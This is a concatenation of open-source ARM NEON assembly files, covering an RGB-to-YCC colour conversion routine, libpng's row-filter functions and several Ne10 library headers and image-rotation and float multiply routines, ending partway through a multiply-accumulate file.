.short 19595, 38470, 7471, 11059
.short 21709, 32768, 27439, 5329
.short 32767, 128, 32767, 128
.short 32767, 128, 32767, 128
asm_function jsimd_\colorid\()_ycc_convert_neon
OUTPUT_WIDTH .req r0
INPUT_BUF .req r1
OUTPUT_BUF .req r2
OUTPUT_ROW .req r3
NUM_ROWS .req r4
OUTPUT_BUF0 .req r5
OUTPUT_BUF1 .req r6
OUTPUT_BUF2 .req OUTPUT_BUF
RGB .req r7
Y .req r8
U .req r9
V .req r10
N .req ip
/* Load constants to d0, d1, d2, d3 */
adr ip, jsimd_\colorid\()_ycc_neon_consts
vld1.16 {d0, d1, d2, d3}, [ip, :128]
/* Save Arm registers and handle input arguments */
push {r4, r5, r6, r7, r8, r9, r10, lr}
ldr NUM_ROWS, [sp, #(4 * 8)]
ldr OUTPUT_BUF0, [OUTPUT_BUF]
ldr OUTPUT_BUF1, [OUTPUT_BUF, #4]
ldr OUTPUT_BUF2, [OUTPUT_BUF, #8]
.unreq OUTPUT_BUF
/* Save Neon registers */
vpush {d8 - d15}
/* Outer loop over scanlines */
cmp NUM_ROWS, #1
blt 9f
0:
ldr Y, [OUTPUT_BUF0, OUTPUT_ROW, lsl #2]
ldr U, [OUTPUT_BUF1, OUTPUT_ROW, lsl #2]
mov N, OUTPUT_WIDTH
ldr V, [OUTPUT_BUF2, OUTPUT_ROW, lsl #2]
add OUTPUT_ROW, OUTPUT_ROW, #1
ldr RGB, [INPUT_BUF], #4
/* Inner loop over pixels */
subs N, N, #8
blt 3f
do_load \bpp, 8
do_rgb_to_yuv_stage1
subs N, N, #8
blt 2f
1:
do_rgb_to_yuv_stage2_store_load_stage1
subs N, N, #8
bge 1b
2:
do_rgb_to_yuv_stage2
do_store 8
tst N, #7
beq 8f
3:
tst N, #4
beq 3f
do_load \bpp, 4
3:
tst N, #2
beq 4f
do_load \bpp, 2
4:
tst N, #1
beq 5f
do_load \bpp, 1
5:
do_rgb_to_yuv
tst N, #4
beq 6f
do_store 4
6:
tst N, #2
beq 7f
do_store 2
7:
tst N, #1
beq 8f
do_store 1
8:
subs NUM_ROWS, NUM_ROWS, #1
bgt 0b
9:
/* Restore all registers and return */
vpop {d8 - d15}
pop {r4, r5, r6, r7, r8, r9, r10, pc}
.unreq OUTPUT_WIDTH
.unreq OUTPUT_ROW
.unreq INPUT_BUF
.unreq NUM_ROWS
.unreq OUTPUT_BUF0
.unreq OUTPUT_BUF1
.unreq OUTPUT_BUF2
.unreq RGB
.unreq Y
.unreq U
.unreq V
.unreq N
.purgem do_rgb_to_yuv
.purgem do_rgb_to_yuv_stage1
.purgem do_rgb_to_yuv_stage2
.purgem do_rgb_to_yuv_stage2_store_load_stage1
.endm
/*--------------------------------- id ----- bpp R G B */
generate_jsimd_rgb_ycc_convert_neon extrgb, 24, 0, 1, 2
generate_jsimd_rgb_ycc_convert_neon extbgr, 24, 2, 1, 0
generate_jsimd_rgb_ycc_convert_neon extrgbx, 32, 0, 1, 2
generate_jsimd_rgb_ycc_convert_neon extbgrx, 32, 2, 1, 0
generate_jsimd_rgb_ycc_convert_neon extxbgr, 32, 3, 2, 1
generate_jsimd_rgb_ycc_convert_neon extxrgb, 32, 1, 2, 3
.purgem do_load
.purgem do_store
|
open-vela/external_libpng | 8,352 | arm/filter_neon.S |
/* filter_neon.S - NEON optimised filter functions
*
* Copyright (c) 2018 Cosmin Truta
* Copyright (c) 2014,2017 Glenn Randers-Pehrson
* Written by Mans Rullgard, 2011.
*
* This code is released under the libpng license.
* For conditions of distribution and use, see the disclaimer
* and license in png.h
*/
/* This is required to get the symbol renames, which are #defines, and the
* definitions (or not) of PNG_ARM_NEON_OPT and PNG_ARM_NEON_IMPLEMENTATION.
*/
#define PNG_VERSION_INFO_ONLY
#include "../pngpriv.h"
#if (defined(__linux__) || defined(__FreeBSD__)) && defined(__ELF__)
.section .note.GNU-stack,"",%progbits /* mark stack as non-executable */
#endif
#ifdef PNG_READ_SUPPORTED
/* Assembler NEON support - only works for 32-bit ARM (i.e. it does not work for
* ARM64). The code in arm/filter_neon_intrinsics.c supports ARM64, however it
* only works if -mfpu=neon is specified on the GCC command line. See pngpriv.h
* for the logic which sets PNG_USE_ARM_NEON_ASM:
*/
#if PNG_ARM_NEON_IMPLEMENTATION == 2 /* hand-coded assembler */
#if PNG_ARM_NEON_OPT > 0
#ifdef __ELF__
# define ELF
#else
# define ELF @
#endif
.arch armv7-a
.fpu neon
.macro func name, export=0
.macro endfunc
ELF .size \name, . - \name
.endfunc
.purgem endfunc
.endm
.text
/* Explicitly specifying alignment here because some versions of
* GAS don't align code correctly. This is harmless in correctly
* written versions of GAS.
*/
.align 2
.if \export
.global \name
.endif
ELF .type \name, STT_FUNC
.func \name
\name:
.endm
func png_read_filter_row_sub4_neon, export=1
ldr r3, [r0, #4] @ rowbytes
vmov.i8 d3, #0
1:
vld4.32 {d4[],d5[],d6[],d7[]}, [r1,:128]
vadd.u8 d0, d3, d4
vadd.u8 d1, d0, d5
vadd.u8 d2, d1, d6
vadd.u8 d3, d2, d7
vst4.32 {d0[0],d1[0],d2[0],d3[0]},[r1,:128]!
subs r3, r3, #16
bgt 1b
bx lr
endfunc
func png_read_filter_row_sub3_neon, export=1
ldr r3, [r0, #4] @ rowbytes
vmov.i8 d3, #0
mov r0, r1
mov r2, #3
mov r12, #12
vld1.8 {q11}, [r0], r12
1:
vext.8 d5, d22, d23, #3
vadd.u8 d0, d3, d22
vext.8 d6, d22, d23, #6
vadd.u8 d1, d0, d5
vext.8 d7, d23, d23, #1
vld1.8 {q11}, [r0], r12
vst1.32 {d0[0]}, [r1,:32], r2
vadd.u8 d2, d1, d6
vst1.32 {d1[0]}, [r1], r2
vadd.u8 d3, d2, d7
vst1.32 {d2[0]}, [r1], r2
vst1.32 {d3[0]}, [r1], r2
subs r3, r3, #12
bgt 1b
bx lr
endfunc
func png_read_filter_row_up_neon, export=1
ldr r3, [r0, #4] @ rowbytes
1:
vld1.8 {q0}, [r1,:128]
vld1.8 {q1}, [r2,:128]!
vadd.u8 q0, q0, q1
vst1.8 {q0}, [r1,:128]!
subs r3, r3, #16
bgt 1b
bx lr
endfunc
func png_read_filter_row_avg4_neon, export=1
ldr r12, [r0, #4] @ rowbytes
vmov.i8 d3, #0
1:
vld4.32 {d4[],d5[],d6[],d7[]}, [r1,:128]
vld4.32 {d16[],d17[],d18[],d19[]},[r2,:128]!
vhadd.u8 d0, d3, d16
vadd.u8 d0, d0, d4
vhadd.u8 d1, d0, d17
vadd.u8 d1, d1, d5
vhadd.u8 d2, d1, d18
vadd.u8 d2, d2, d6
vhadd.u8 d3, d2, d19
vadd.u8 d3, d3, d7
vst4.32 {d0[0],d1[0],d2[0],d3[0]},[r1,:128]!
subs r12, r12, #16
bgt 1b
bx lr
endfunc
func png_read_filter_row_avg3_neon, export=1
push {r4,lr}
ldr r12, [r0, #4] @ rowbytes
vmov.i8 d3, #0
mov r0, r1
mov r4, #3
mov lr, #12
vld1.8 {q11}, [r0], lr
1:
vld1.8 {q10}, [r2], lr
vext.8 d5, d22, d23, #3
vhadd.u8 d0, d3, d20
vext.8 d17, d20, d21, #3
vadd.u8 d0, d0, d22
vext.8 d6, d22, d23, #6
vhadd.u8 d1, d0, d17
vext.8 d18, d20, d21, #6
vadd.u8 d1, d1, d5
vext.8 d7, d23, d23, #1
vld1.8 {q11}, [r0], lr
vst1.32 {d0[0]}, [r1,:32], r4
vhadd.u8 d2, d1, d18
vst1.32 {d1[0]}, [r1], r4
vext.8 d19, d21, d21, #1
vadd.u8 d2, d2, d6
vhadd.u8 d3, d2, d19
vst1.32 {d2[0]}, [r1], r4
vadd.u8 d3, d3, d7
vst1.32 {d3[0]}, [r1], r4
subs r12, r12, #12
bgt 1b
pop {r4,pc}
endfunc
.macro paeth rx, ra, rb, rc
vaddl.u8 q12, \ra, \rb @ a + b
vaddl.u8 q15, \rc, \rc @ 2*c
vabdl.u8 q13, \rb, \rc @ pa
vabdl.u8 q14, \ra, \rc @ pb
vabd.u16 q15, q12, q15 @ pc
vcle.u16 q12, q13, q14 @ pa <= pb
vcle.u16 q13, q13, q15 @ pa <= pc
vcle.u16 q14, q14, q15 @ pb <= pc
vand q12, q12, q13 @ pa <= pb && pa <= pc
vmovn.u16 d28, q14
vmovn.u16 \rx, q12
vbsl d28, \rb, \rc
vbsl \rx, \ra, d28
.endm
func png_read_filter_row_paeth4_neon, export=1
ldr r12, [r0, #4] @ rowbytes
vmov.i8 d3, #0
vmov.i8 d20, #0
1:
vld4.32 {d4[],d5[],d6[],d7[]}, [r1,:128]
vld4.32 {d16[],d17[],d18[],d19[]},[r2,:128]!
paeth d0, d3, d16, d20
vadd.u8 d0, d0, d4
paeth d1, d0, d17, d16
vadd.u8 d1, d1, d5
paeth d2, d1, d18, d17
vadd.u8 d2, d2, d6
paeth d3, d2, d19, d18
vmov d20, d19
vadd.u8 d3, d3, d7
vst4.32 {d0[0],d1[0],d2[0],d3[0]},[r1,:128]!
subs r12, r12, #16
bgt 1b
bx lr
endfunc
func png_read_filter_row_paeth3_neon, export=1
push {r4,lr}
ldr r12, [r0, #4] @ rowbytes
vmov.i8 d3, #0
vmov.i8 d4, #0
mov r0, r1
mov r4, #3
mov lr, #12
vld1.8 {q11}, [r0], lr
1:
vld1.8 {q10}, [r2], lr
paeth d0, d3, d20, d4
vext.8 d5, d22, d23, #3
vadd.u8 d0, d0, d22
vext.8 d17, d20, d21, #3
paeth d1, d0, d17, d20
vst1.32 {d0[0]}, [r1,:32], r4
vext.8 d6, d22, d23, #6
vadd.u8 d1, d1, d5
vext.8 d18, d20, d21, #6
paeth d2, d1, d18, d17
vext.8 d7, d23, d23, #1
vld1.8 {q11}, [r0], lr
vst1.32 {d1[0]}, [r1], r4
vadd.u8 d2, d2, d6
vext.8 d19, d21, d21, #1
paeth d3, d2, d19, d18
vst1.32 {d2[0]}, [r1], r4
vmov d4, d19
vadd.u8 d3, d3, d7
vst1.32 {d3[0]}, [r1], r4
subs r12, r12, #12
bgt 1b
pop {r4,pc}
endfunc
#endif /* PNG_ARM_NEON_OPT > 0 */
#endif /* PNG_ARM_NEON_IMPLEMENTATION == 2 (assembler) */
#endif /* READ */
|
open-vela/external_Ne10 | 2,035 | common/versionheader.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : common/versionheader.s
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ version information
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.equ VERSION_MAJOR, 0
.equ VERSION_MINOR, 9
.equ VERSION_REVISION, 10
.equ PHASE, 1
.equ COPYRIGHT_YEAR, 2012
COPYRIGHT_HOLDER:
.asciz "ARM Ltd."
|
open-vela/external_Ne10 | 1,899 | common/NE10header.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : common/NE10header.s
@
.include "versionheader.s"
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ constant values that are used across the library
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.equ NE10_OK, 0
.equ NE10_ERR, -1
|
open-vela/external_Ne10 | 9,638 | modules/imgproc/NE10_rotate.neon.s | /*
* Copyright 2013-16 ARM Limited and Contributors.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of ARM Limited nor the
* names of its contributors may be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
* NE10 Library : imgproc/NE10_rotate.neon.s
*/
#ifdef ENABLE_NE10_IMG_ROTATE_RGBA_NEON
.text
.syntax unified
/**
* @details
* This function implements the image rotation (angle < 90)
*
* @param[out] *dst points to the output pointers
* @param[in] *src points to input pointers
* @param[in] swidth width of input buffer
* @param[in] sheight height of input buffer
* @param[in] dwidth width of output buffer
* @param[in] dheight height of output buffer
* @param[in] *matrix matrix of rotate
*/
.align 4
.global ne10_img_rotate_get_quad_rangle_subpix_rgba_neon
.thumb
.thumb_func
ne10_img_rotate_get_quad_rangle_subpix_rgba_neon:
/*ARM Registers*/
/* long-term variable */
pDst .req r0
pSrc .req r1
dstHeight .req r4
srcStep .req r5
dstStep .req r6
countX .req r7
countY .req r8
/* short-term variable */
/* out of loopY */
srcWidth .req r2
srcHeight .req r3
dstWidth .req r9
pMatrix .req r10
/* in loopY */
ixs .req r2
iys .req r3
pTr0 .req r9
pTr1 .req r10
/* temp variable */
tmp0 .req r11
tmp1 .req r12
/*NEON Registers*/
/* long-term variable */
dA1 .dn d0
dA2 .dn d1
dA3 .dn d2
dY .dn d3
dDW .dn d4
dSrcSizeSub1 .dn d5
dSrcSizeSub4 .dn d6
dValOne .dn d7
dValOneF .dn d23
/* short-term variable */
/* out of loopY */
dValFour .dn d16
dSrcSize .dn d17
/* in loopY */
/* temp variable */
qBitSE .qn q8
dBitS .dn d16
dBitE .dn d17
dBitSE .dn d18
dBitIS .dn d19
dOutFlag .dn d19
dPosS .dn d20
dPosE .dn d21
dPosIS .dn d22
dPosAB .dn d8
dPosA1 .dn d9
dIn0_01234567 .dn d26
qIn0_01234567 .qn q13
dIn0_0123 .dn d26
dIn0_4567 .dn d27
dIn1_01234567 .dn d28
qIn1_01234567 .qn q14
dIn1_0123 .dn d28
dIn1_4567 .dn d29
qIn0_0123 .qn q15
qIn0_4567 .qn q5
qIn1_0123 .qn q6
qIn1_4567 .qn q7
qP0 .qn q13
qP1 .qn q14
qOut_0123 .qn q5
dOut_0123 .dn d10
dOut_hw .dn d11
dPosISF .dn d30
qTmp0 .qn q15
dTmp0 .dn d30
dTmp1 .dn d31
push {r4-r12, lr}
vpush {d8-d15}
/* load parameters from sp*/
ldr dstWidth, [sp, #104]
ldr dstHeight, [sp, #108]
ldr pMatrix, [sp, #112]
lsl srcStep, srcWidth, #2
lsl dstStep, dstWidth, #2
vld3.f32 {dA1, dA2, dA3}, [pMatrix]
/* set number of loop y */
mov countY, dstHeight
/* set NEON register for 1 and 4*/
mov tmp0, #1
vdup.32 dValOne, tmp0
vcvt.f32.u32 dValOneF, dValOne
vshl.s32 dValFour, dValOne, #2
vmov dSrcSize, srcWidth, srcHeight
vsub.i32 dSrcSizeSub4, dSrcSize, dValFour
vsub.i32 dSrcSizeSub1, dSrcSize, dValOne
/* loop y start */
@cbz countY, GetQuadrangleSubPixEnd
sub tmp1, dstWidth, #1
vdup.32 dDW, tmp1
vcvt.f32.u32 dDW, dDW
vmul.f32 dDW, dA1, dDW
GetQuadrangleSubPixLoopY:
sub tmp0, dstHeight, countY
vdup.32 dY, tmp0
vcvt.f32.u32 dY, dY
/* calculate xs, ys, xe, ye */
vmov.f32 dPosS, dA3
vmla.f32 dPosS, dA2, dY
vadd.f32 dPosE, dDW, dPosS
vcvt.s32.f32 dPosIS, dPosS
vcvt.s32.f32 dPosE, dPosE
vsub.s32 dBitS, dPosIS, dValOne
vsub.s32 dPosE, dPosE, dValOne
vcgt.u32 dBitS, dSrcSizeSub4, dBitS
vcgt.u32 dBitE, dSrcSizeSub4, dPosE
vrev64.32 dTmp0, dBitS
vrev64.32 dTmp1, dBitE
vand.32 dBitS, dBitS, dTmp0
vand.32 dBitE, dBitE, dTmp1
vand.32 dBitSE, dBitE, dBitS
/* set number of loop x */
lsr countX, dstStep, #2
GetQuadrangleSubPixLoopX:
vcvt.s32.f32 dPosIS, dPosS
vcvt.f32.s32 dPosISF, dPosIS
vsub.f32 dPosAB, dPosS, dPosISF
vsub.f32 dPosA1, dValOneF, dPosAB
vcgt.u32 dBitIS, dSrcSizeSub1, dPosIS
vrev64.32 dTmp0, dBitIS
vand.32 dBitIS, dBitIS, dTmp0
vadd.f32 dPosS, dPosS, dA1
vorr dOutFlag, dBitIS, dBitSE
/* to avoid that ixs/iys is negative. this will result in bad address of pTr0/pTr1 */
vabs.s32 dPosIS, dPosIS
vmov ixs, iys, dPosIS
lsl ixs, ixs, #2
mla tmp0, srcStep, iys, ixs
add pTr0, pSrc, tmp0
add pTr1, pTr0, srcStep
vld1.8 {dIn0_01234567}, [pTr0]
vld1.8 {dIn1_01234567}, [pTr1]
vmovl.u8 qIn0_01234567, dIn0_01234567
vmovl.u8 qIn1_01234567, dIn1_01234567
vmovl.u16 qIn0_0123, dIn0_0123
vmovl.u16 qIn1_0123, dIn1_0123
vmovl.u16 qIn0_4567, dIn0_4567
vmovl.u16 qIn1_4567, dIn1_4567
vcvt.f32.u32 qIn0_0123, qIn0_0123
vcvt.f32.u32 qIn1_0123, qIn1_0123
vcvt.f32.u32 qIn0_4567, qIn0_4567
vcvt.f32.u32 qIn1_4567, qIn1_4567
vmul.f32 qP0, qIn0_0123, dPosA1[0]
vmul.f32 qP1, qIn1_0123, dPosA1[0]
vmla.f32 qP0, qIn0_4567, dPosAB[0]
vmla.f32 qP1, qIn1_4567, dPosAB[0]
vsub.f32 qTmp0, qP1, qP0
vmla.f32 qP0, qTmp0, dPosAB[1]
vcvt.u32.f32 qOut_0123, qP0
vmovn.u32 dOut_0123, qOut_0123
vand.u32 dOut_0123, dOut_0123, dOutFlag
vmovn.u16 dOut_0123, qOut_0123
vst1.32 {dOut_0123[0]}, [pDst]!
subs countX, countX, #1
bgt GetQuadrangleSubPixLoopX
subs countY, countY, #1
bgt GetQuadrangleSubPixLoopY
GetQuadrangleSubPixEnd:
/*Return From Function*/
vpop {d8-d15}
pop {r4-r12, pc}
.end
#endif // ENABLE_NE10_IMG_ROTATE_RGBA_NEON
|
open-vela/external_Ne10 | 3,210 | modules/math/NE10_mul.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mul.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_mul_float_asm
.thumb
.thumb_func
ne10_mul_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mul_float(arm_vec2f_t * dst,
@ arm_float_t * src1, const arm_float_t * src2,
@ unsigned int count)
@
@ r0: *dst & current src1 entry's address - made of base(r0)+offset(r5)
@ r1: *src1 & current src1 entry's address - made of base(r1)+offset(r5)
@ r2: *src2 & current src2 entry's address - made of base(r2)+offset(r5)
@ r3: int count
@
@ r3: loop counter
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r3, .LoopEndFloat
.LoopBeginFloat:
vldr s1, [r1] @ Load s1 = src1[i]
add r1, r1, #4 @ move to the next entry
vldr s2, [r2] @ Load s2 = src2[i]
add r2, r2, #4 @ next entry
vmul.f32 s10, s1, s2 @ s10 = src1[i] * src2[i]
vstr s10, [r0] @ Store the result back into the main memory
add r0, r0, #4 @ next entry in the dst
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
bx lr
|
open-vela/external_Ne10 | 18,658 | modules/math/NE10_mla.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mla.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_mla_float_neon
.thumb
.thumb_func
ne10_mla_float_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mla_float(arm_float_t * dst,
@ arm_float_t * acc,
@ arm_float_t * src1,
@ arm_float_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *acc & current acc entry's address
@ r2: *src1 & current src1 entry's address
@ r3: *src2 & current src2 entry's address
@ r4: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r5: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5}
ldr r4, [r13, #8] @ r4 = count; r13 is the stack pointer (sp)
and r5, r4, #3 @ r5 = count % 4; ; This is what's left to be processed after this loop
sub r4, r4, r5 @ count = count - r5
cbz r4, .L_check_float
@ load the 1st set of values
vld1.32 {q0}, [r2]!
vld1.32 {q1}, [r3]!
vld1.32 {q3}, [r1]!
subs r4, r4, #4
@ calculate values for the 1st set
vmla.f32 q3, q0, q1 @ q3 += q0 * q1
ble .L_mainloopend_float
.L_mainloop_float:
@ load the next (e.g. 2nd) set of values, leave loading acc until later
vld1.32 {q0}, [r2]!
vld1.32 {q1}, [r3]!
@ store the result for the 1st/next (e.g. 2nd) set
vst1.32 {d6,d7}, [r0]!
@ load the next (e.g. 2nd) acc, and decrease the counter
vld1.32 {q3}, [r1]!
subs r4, r4, #4
@ calculate values for the next (e.g. 2nd) set
vmla.f32 q3, q0, q1 @ q3 += q0 * q1
bgt .L_mainloop_float @ loop if r4 > 0, if we have at least another 4 floats
.L_mainloopend_float:
@ the last iteration for this call
@ store the result for the last set of values (e.g 2nd set)
vst1.32 {d6,d7}, [r0]!
.L_check_float:
@ check if anything left to process at the end of the input array
cmp r5, #0
ble .L_return_float
.L_secondloop_float:
@ process the last few items left in the input array
vld1.f32 d0[0], [r2]! @ Fill in d0[0]
vld1.f32 d1[0], [r3]! @ Fill in d1[0]
vld1.f32 d2[0], [r1]! @ Fill in d2[0]
subs r5, r5, #1
@ values
vmla.f32 d2, d0, d1
vst1.32 {d2[0]}, [r0]!
bgt .L_secondloop_float
.L_return_float:
@ return
pop {r4, r5}
mov r0, #0
bx lr
.balign 4
.global ne10_vmla_vec2f_neon
.thumb
.thumb_func
ne10_vmla_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_vmla_vec2f(arm_vec2f_t * dst,
@ arm_vec2f_t * acc,
@ arm_vec2f_t * src1,
@ arm_vec2f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *acc & current acc entry's address
@ r2: *src1 & current src1 entry's address
